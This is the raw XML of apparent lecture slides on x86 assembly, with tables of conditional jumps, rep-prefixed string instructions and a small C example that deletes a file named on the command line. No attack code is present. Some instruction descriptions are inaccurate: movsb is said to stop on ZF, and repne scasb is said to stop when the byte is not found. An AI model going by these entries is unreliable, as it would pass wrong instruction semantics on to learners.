                        <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>jl</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latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>&lt;</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
                        <a:latin typeface="+mj-l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86653672"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4716016" y="2636912"/>
          <a:ext cx="3960440" cy="3931920"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1535124"/>
                <a:gridCol w="2425316"/>
              </a:tblGrid>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
                        <a:t>Instruction</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>jle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t>&lt;=</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>jb</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err="1" smtClean="0"/>
                        <a:t>Jl</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
                        <a:t>, unsinged</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>jbe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err="1" smtClean="0"/>
                        <a:t>Jle</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
                        <a:t>, unsigned</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>jo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t>Overflow flag</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
                        <a:t>OF=1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>js</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t>Sign flag SF=1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>jecxz</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" baseline="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r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
                        <a:t>ECX = 0</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
                        <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
                        <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30435789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a:xfrm>
            <a:off x="457200" y="1196752"/>
            <a:ext cx="7067128" cy="5112568"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Rep (repeat – until ECX=0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>ESI, EDI used for source and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>dest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>. index</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>ECX used as a counter.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Repeat until ECX = 0 or ZF = 1 (or 0)</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84634358"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2483768" y="1844824"/>
          <a:ext cx="4608512" cy="2782199"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1786326"/>
                <a:gridCol w="2822186"/>
              </a:tblGrid>
              <a:tr h="499255">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
                        <a:t>Instruction</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="576064">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2600" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>rep</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2600" dirty="0">
                        <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
                        <a:t>Repeat</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> until  ECX = 0</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="576064">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2600" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>repe</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2600" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2600" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>repz</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2600" dirty="0">
                        <a:latin typeface="Agency FB"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Repeat</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> until  ECX = 0</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" baseline="0" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>or ZF = 0</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="652873">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2600" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>repne</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2600" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2600" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>repnz</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2600" dirty="0">
                        <a:latin typeface="Agency FB"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Repeat</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> until  ECX = 0 or ZF = 1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2728745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a:t>Rep (repeat – until ECX=0) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Table 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2420313039"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1259632" y="1844824"/>
          <a:ext cx="7056784" cy="3608215"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2735312"/>
                <a:gridCol w="4321472"/>
              </a:tblGrid>
              <a:tr h="499255">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
                        <a:t>Instruction</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="576064">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2600" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>repe</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2600" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2600" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>cmpsb</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2600" dirty="0">
                        <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
                        <a:t>Compare to data buffers. ESI, EDI are buffers’ locations. Repeat</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> until  ECX = 0</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="576064">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2600" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>rep </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2600" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>stosb</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2600" dirty="0">
                        <a:latin typeface="Agency FB"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Initialize all bytes of a buffer to a certain value</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="652873">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2600" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>rep </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2600" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>movsb</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2600" dirty="0">
                        <a:latin typeface="Agency FB"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Copy a buffer of bytes. Repeat</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> until  ECX = 0 or ZF = 1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="652873">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2600" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>repne</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2600" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2600" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>scasb</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2600" dirty="0">
                        <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
                        <a:t>Search a data buffer for a single byte. Repeat until ECX=0</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> or byte not found.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4789882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dirty="0" smtClean="0"/>
              <a:t>C Main Method and Offsets</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="496949" y="1865618"/>
            <a:ext cx="2869696" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>program.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-r </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>filename.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="0">
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467544" y="2780928"/>
            <a:ext cx="3888432" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, char* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>[])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> != 3) {return 0;}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>strncmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>[1], "-r", 2) == 0){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>DeleteFileA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>[2]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4716016" y="1420264"/>
            <a:ext cx="4266498" cy="5078313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
